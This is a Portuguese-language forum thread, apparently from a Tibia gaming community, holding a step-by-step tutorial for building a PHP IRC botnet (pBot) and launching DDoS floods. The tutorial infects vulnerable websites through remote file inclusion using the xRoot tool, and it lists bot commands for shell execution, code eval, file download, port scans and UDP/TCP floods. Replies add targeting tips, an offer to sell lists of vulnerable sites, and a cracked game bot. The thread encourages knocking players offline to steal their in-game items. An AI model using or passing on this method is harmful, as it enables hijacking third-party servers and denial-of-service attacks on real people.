Ir para conteúdo
Faça parte da equipe! (2024) ×

Nukando realmente um ot com DoS(Denial of Service) 2009


western182
 Compartilhar

Posts Recomendados

Introdução

 

Tenho visto vários tópicos com dúvidas sobre DoS. Então resolvi criar esse tutorial onde vou mostrar como fazer um DoS reuindo vários bots no IRC e mandar o ataque de várias máquinas de uma só vez

 

ps: para quem nao sabe o que é um ataque DoS,IRC,Pbot,BotNet,Shell pesquise no google,ou tire duvidas diretamente a mim!

 

Downloads

 

xRoot + Triad List Sites Editor - Usamos o xRoot e o Triad List Sites Editor para rodar todos os bots de uma vez. Imaginem se tivessemos que visitar site por site, testando máquina por máquina, ia demorar muito pra carregar os bots.

Mirror 1 Download Xroot+Triad List Sites Editor

 

Mirror 2 Download Xroot+Triad List Sites Editor

 

Mirror 3 Download Xroot+Triad List Sites Editor

 

Senha para descompactar o xroot : xroot

Cliente mIRC - Você também pode baixar scripts como CyberScript, ou até mesmo usar o ChatZilla que é uma extenção para Firefox, vai de sua preferência.

 

Mirror 1 Donwload mIRC

 

Mirror 2 Download mIRC

 

Mirror 3 Download mIRC

 

pBot - Essa é uma botnet em PHP muito boa. A vantagem de usar botnet em PHP, é que roda tanto em Linux quando Windows, já que podemos rodar direto pelo link como se fôssemos usar o pBot como uma phpshell. É só upar o seu pBot configurado em algum host de sua preferência, e rodar no RFI: http://www.host.com.br/vuln.php?fvox=http://seuhost.com.br/pBot.txt.

Vocês podem usar também botnets em perl, mas só vai rodar em Linux e é difícil rodar em todas as máquinas de uma vez só.

 

Download pBot

 

Configurando

 

A configuração do pBot é muito simples. A configuração começa na linha número 8. Localize essa parte no script, e vamos então configurar.

 

É necessário se cadastrar para acessar o conteúdo.

 

 

server: Nessa parte da configuração você deve colocar a rede em que os bots vão conectar. Ali eu coloquei irc.chatbr.org, que é uma rede muito boa onde fica o canal do fórum invaders.

port: Porta da rede. A porta padrão é 6667.

pass: Você deve colocar a senha para logar no bot. Sem a senha, você não executa comandos. No caso, a senha que eu escolhi foi fx.

prefix: O nome dos bots são gerados randomicamente. Entretanto, o prefix fica no meio do nome do bot. Exemplo de nome: [A]fvox01080371.

chan: Insira o nome do canal onde os bots vão conectar, e por onde você vai comandar os bots.

password: Caso o canal esteja em modo "+k", ou seja, canal com chave (key), coloque a senha do canal.

 

O resto das configurações vocês podem deixar assim mesmo.

 

Arrumando a lista de sites vulneráveis

 

Para rodar os bots, vocês vão ter que ter uma lista de sites vulneráveis a PHP Injection.

Abra o programa (-TRIAD-) List Sites Editor.exe, clique no botão abrir e selecione a lista de sites vulneráveis.

Na parte "Remover da URL:", coloque um "=" (sem aspas) no campo de texto do "Tudo que estiver a FRENTE de:" e então cliquem no Go.

Agora todos os sites estão só até o "=".

Copie todos os sites usando o Control+C ao invés do botão Salvar. O botão Salvar, grava todos os sites em um arquivo *.rtf ao invés de *.txt.

Agora cole usando Control+V no Blobo de notas e salve o arquivo.

 

listsiteskg4.png

 

Rodando os bots

 

Agora chegou a hora de usar o xRoot. Abrindo o xRoot, vamos até a aba Scan.

 

Vamos clicar no botão Abrir lista e selecionar a lista que filtramos com o Triad List Sites.

triad2.png

 

Já com o pBot configurado e upado em algum host, colocamos o link do pBot no campo de texto referente a "CMD pra por:" (não se esqueçam de deixar o "?" depois do .txt. Em "Achar:" pode deixar em branco, afinal é só pro xRoot visitar site por site da lista mesmo.

Agora devemos clicar no botão "Por CMD" e aguardar o xRoot inserir a cmd nas urls.

 

xroot2tz5.png

 

Depois de colocar a CMD após o "=" com o xRoot, é só clicar no botão "Testar sites...".

Agora como o xRoot visita site por site procurando por vulneráveis, logo os bots vão rodar automaticamente, facilitando muito as coisas! :D

 

runbotseb5.png

 

Logando nos bots

 

Sem você fazer o login nos bots, eles não te respondem aos comandos.

Para fazer o login, você deve usar o comando .user <senha>.

A senha é aquela que você definiu na parte de configuração do pBot.

Para logar, vou usar o comando .user b0t, onde "b0t" foi a senha que eu escolhi para fazer esse tutorial.

 

Atacando

 

O pBot pode fazer UDP Flood e TCP Flood.

Eu já vi algumas botnets em perl que fazem até syn flood, mas eu curto o pBot :mrgreen:

Para pacotar: .udpflood <target> <packets> <packetsize> <delay>.

Eu vou usar 65000 packets, 65000 de packetsize e o delay eu usarei 30.

Então usarei: .udpflood <ip> 65000 65000 30

 

udpfloodad4.png

 

Comandos pBot

 

Aqui vai uma lista com outros comandos que vocês podem usar do pBot:

 

= COMMANDS ============================================================================

.user <password> //login to the bot

.logout //logout of the bot

.die //kill the bot

.restart //restart the bot

.mail <to> <from> <subject> <msg> //send an email

.dns <IP|HOST> //dns lookup

.download <URL> <filename> //download a file

.exec <cmd> // uses shell_exec() //execute a command

.cmd <cmd> // uses popen() //execute a command

.info //get system information

.php <php code> // uses eval() //execute php code

.tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack

.udpflood <target> <packets> <packetsize> <delay> //udpflood attack

.raw <cmd> //raw IRC command

.rndnick //change nickname

.pscan <host> <port> //port scan

.ud.server <newhost> <newport> [newpass] //change IRC server

---------------------------------------------------------------------------------------

 

Fim

 

Vou postar um video de um colega em ação com os Bot's dele!!E Lembrando, com esse método, voce consgue nukar alguem da internet..nao estou insentivando NINGUEM a usar apenas ensinando..MUITOS jogadores de tibia usam esse método para nukar alguem do tibia global e matar ele e pegar os itens.. ou quando alguem poe um item no dp nuka a pessoa e pega os itens, e por ai vai com sua criatividade!!

ps:Alguns antivirus podem detectar xRoot como malicioso! OBVIO pois ele procura "falhas" nos sites para executar a shell, portanto nao fiquem com medo..

 

Video -> YouTube - Ddos with botnets on irc

 

Fim do tutorial ;]

Se vocês tiverem dúvidas sobre isso postem aqui ou mandem PM ou adicionem no msn > [email protected]

 

 

Grata,

 

T1z1L

Link para o comentário
Compartilhar em outros sites

entendoo que da preguiça, mas nem tudo é facil amigo =\ nuka site sim!! basta voce ir no cmd ( prompt de comando) digitar

 

ping http://www.nomedosite.com.br ele vai dar o Ip do site vc bota o Ip do site no mIRC .. por exemplo digito la no cmd o ip deu .. 201.132.0.1 vai no mIRC com seus bot on vc poe .udpflood 201.132.0.1 65530 60

 

sacou ?:D

 

e OLha que dei uma grande resumida nisso viu ;s

 

qualquer duvida mande ai

Link para o comentário
Compartilhar em outros sites

  • 3 semanas atrás...

Você poderia postar, lista de sites vulneráveis a php injection...

bY tIm~

Um vírus.

Despercebido,

ele entra pelos seus poros sem avisar,

espalhando-se silenciosa e lentamente.

Antes que você perceba o contágio, ele já o pegou.

Link para o comentário
Compartilhar em outros sites

Então.. MUITOS me adicionram no msn pedindo lista de sites vulneraveis de php ou rfi ou perl, infelismente isso nao vou poder dar de maos beijadas! como eu disse dei 90% do trabalho ai galera basta vcs estudarem um pouco e aprender a achar lista de sites vul.. ou entao como ja avisei alguns e 3 ja compraram minha lista com 650 sites vul em php eu vendo!! mais informações add no msn..

 

 

[email protected]

 

:[red]*[/red]

 

ESTUDEM,MAS JA ADIANTO! NÃO É FACIL!!!!!

Link para o comentário
Compartilhar em outros sites

me desculpe mas o (-TRIAD-) List Sites Editor.exe quando eu abro ele

configuro ele td certinho e clico la em go

ele nao faz nada

e normal?

 

e a propozito

amei seu ardamax keylogger!

ctrl+alt+shift+h

fui la e desativei ele e desinstalei!

mas fora isso ta blz

em pq q o(-TRIAD-) List Sites Editor.exe nao roda?

Link para o comentário
Compartilhar em outros sites

crack tibia bot ng 8.54

 

Bom galera estou aqui com o download do crack do tibia bot 8.54.

para quem nao sabe o tibia bot é um hack que seu char caça sozinho, pesca , runa , treina ml e o mais importante voce pega lvl muito rapido e gold.

 

Download Tibia Bot > TibiaBot.com - Tibia will never get easier!

 

 

Download Crack Tibia Bot > MEGAUPLOAD - The leading online storage and file delivery service

Scan > Virustotal. MD5: 07314a146cad9fe38d1bedade066a9a2

 

 

Galera o Tutorial vem junto com o crack.

 

Espero ter ajudado muitos tibianos ;)

Link para o comentário
Compartilhar em outros sites

  • 1 mês depois...
  • 2 semanas atrás...
  • 2 meses depois...

bruceburns quanto mais vezes vc clicar melhor pra nukar!!

DaNiLoO aLVES pra vc conseguir nukar global vc teria que ter uma lista IMEEEEEEEEEEEEENSAAA de shell para nukar.. no 7.1 eu ja consegui lagar bastante o global nesse método mas Hoje em dia nem tento por que precisaria de uma lista absurda..

Link para o comentário
Compartilhar em outros sites

  • 2 semanas atrás...

2 coisas. Isso não é DoS, e sim DDoS. Outra é de que vc retirou o post de outro forum e esqueceu de por os créditos :p

 

bruceburns[/color] quanto mais vezes vc clicar melhor pra nukar!!

DaNiLoO aLVES pra vc conseguir nukar global vc teria que ter uma lista IMEEEEEEEEEEEEENSAAA de shell para nukar.. no 7.1 eu ja consegui lagar bastante o global nesse método mas Hoje em dia nem tento por que precisaria de uma lista absurda..

 

Outra coisa, não seria preciso uma lista mto grande pra derrubar um servidor como de tibia. Uns 300 pbots ou então se vc tivesse a manha, poderia rodar bot em perl nesses servidores, ai só seriam necessários uns 15 bots pra derrubar qualquer servidor do planeta :P

 

Pro cara que falou pra usar Sprut pra nukar.. por favor não acreditem nisso pq programa de tcpflood é um lixo e não serve pra nukar nada faz anos.

 

comando dos bots pra pegar ip de algum site é simples.

 

digite .dns <site>

depois é so dar um comando pra atacar o site ou então se tiver ip da pessoa é só digitar

 

.udpflood <ip> <packetsize> <tempo> <range>. packetsize o valor maximo eh 65350, vc pode por 3983u18926162169271 q o maxim q vai mandar eh 65350.

 

o tempo, como phpbot eh mto instavel, ponha um ataque moderado, entre 50 e 180 segundos. range ponha 0, mas o range não muda nada.

Link para o comentário
Compartilhar em outros sites

Este tópico está impedido de receber novos posts.
 Compartilhar

  • Quem Está Navegando   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.
×
×
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.